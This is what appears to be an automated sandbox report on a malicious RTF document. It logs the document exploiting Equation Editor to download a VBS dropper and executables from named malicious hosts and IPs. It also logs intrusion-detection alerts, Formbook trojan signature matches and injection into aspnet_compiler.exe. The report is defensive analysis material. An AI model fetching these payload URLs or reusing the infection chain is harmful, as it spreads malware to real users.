          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443

          Networking

          Source: Network trafficSuricata IDS: 2019696 - Severity 1 - ET MALWARE Possible MalDoc Payload Download Nov 11 2014 : 192.168.2.22:49166 -> 185.18.213.20:443
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Dropped file: stream.SaveToFile filePath, 2 ' 2 to overwrite if the file exists
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Dropped file: stream.SaveToFile filePath, 2 ' 2 to overwrite if the file exists
          Source: global trafficHTTP traffic detected: GET /kokorila/cgl-bin/bin.exe HTTP/1.1Host: dl.zerotheme.irConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kokorila/cgl-bin/DLLL.dll HTTP/1.1Host: dl.zerotheme.ir
          Source: Joe Sandbox ViewASN Name: AFRARASAIR AFRARASAIR
          Source: Joe Sandbox ViewASN Name: SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR
          Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49167 -> 185.18.213.20:443
          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficHTTP traffic detected: GET /90/seethedifferentofpicture.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F96B07FF-ED02-4BEA-95F3-9B31FFA866FE}.tmp
          Source: global trafficHTTP traffic detected: GET /kokorila/cgl-bin/bin.exe HTTP/1.1Host: dl.zerotheme.irConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kokorila/cgl-bin/DLLL.dll HTTP/1.1Host: dl.zerotheme.ir
          Source: global trafficHTTP traffic detected: GET /90/seethedifferentofpicture.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: dl.zerotheme.ir
          Source: EQNEDT32.EXE, 00000002.00000002.360437444.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/90/seethedifferentofpicture.vbs
          Source: EQNEDT32.EXE, 00000002.00000002.360437444.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/90/seethedifferentofpicture.vbsj
          Source: EQNEDT32.EXE, 00000002.00000002.360437444.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/90/seethedifferentofpicture.vbso
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: temp_executable.exe, 00000006.00000002.378697765.000000000261B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.zerotheme.ir
          Source: temp_executable.exe, 00000006.00000002.378697765.000000000261B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.zerotheme.irX
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: temp_executable.exe, 00000006.00000002.378697765.000000000265F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.zerotheme.ir
          Source: temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dll
          Source: temp_executable.exe, 00000006.00000002.378697765.000000000265F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378543206.0000000000860000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.zerotheme.ir/kokorila/cgl-bin/bin.exe
          Source: temp_executable.exe, 00000006.00000002.378697765.000000000257F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378697765.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.zerotheme.ir/kokorila/cgl-bin/bin.exebhttps://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dll
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
          Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
          Source: unknownHTTPS traffic detected: 185.18.213.20:443 -> 192.168.2.22:49166 version: TLS 1.2

          E-Banking Fraud

          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: eMJ2QgQF4u.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Windows\SysWOW64\wscript.exe  COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\ProgID
          Source: C:\Windows\SysWOW64\wscript.exe  COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Memory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exe  Memory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe  Memory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Memory allocated: 770B0000 page execute and read and write
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0042BDA3 NtClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009107AC NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090F9F0 NtClose, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FAE8 NtQueryInformationProcess, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FB68 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FDC0 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009100C4 NtCreateFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00910048 NtProtectVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00910078 NtResumeThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00910060 NtQuerySection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009101D4 NtSetValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0091010C NtOpenDirectoryObject
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00910C40 NtGetContextThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009110D0 NtOpenProcessToken
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00911148 NtOpenThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090F8CC NtWaitForSingleObject
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090F900 NtReadFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00911930 NtSetContextThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090F938 NtWriteFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FAB8 NtQueryValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FAD0 NtAllocateVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FA20 NtQueryInformationFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FA50 NtEnumerateValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FBB8 NtQueryInformationToken
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FBE8 NtQueryVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FB50 NtCreateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FC90 NtUnmapViewOfSection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FC30 NtOpenProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FC48 NtSetInformationFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FC60 NtMapViewOfSection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00911D80 NtSuspendThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FD8C NtDelayExecution
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FD5C NtEnumerateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FEA0 NtReadVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FED0 NtAdjustPrivilegesToken
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FE24 NtWriteVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FFB4 NtCreateSection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FFFC NtCreateProcessEx
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0090FF34 NtQueueApcThread
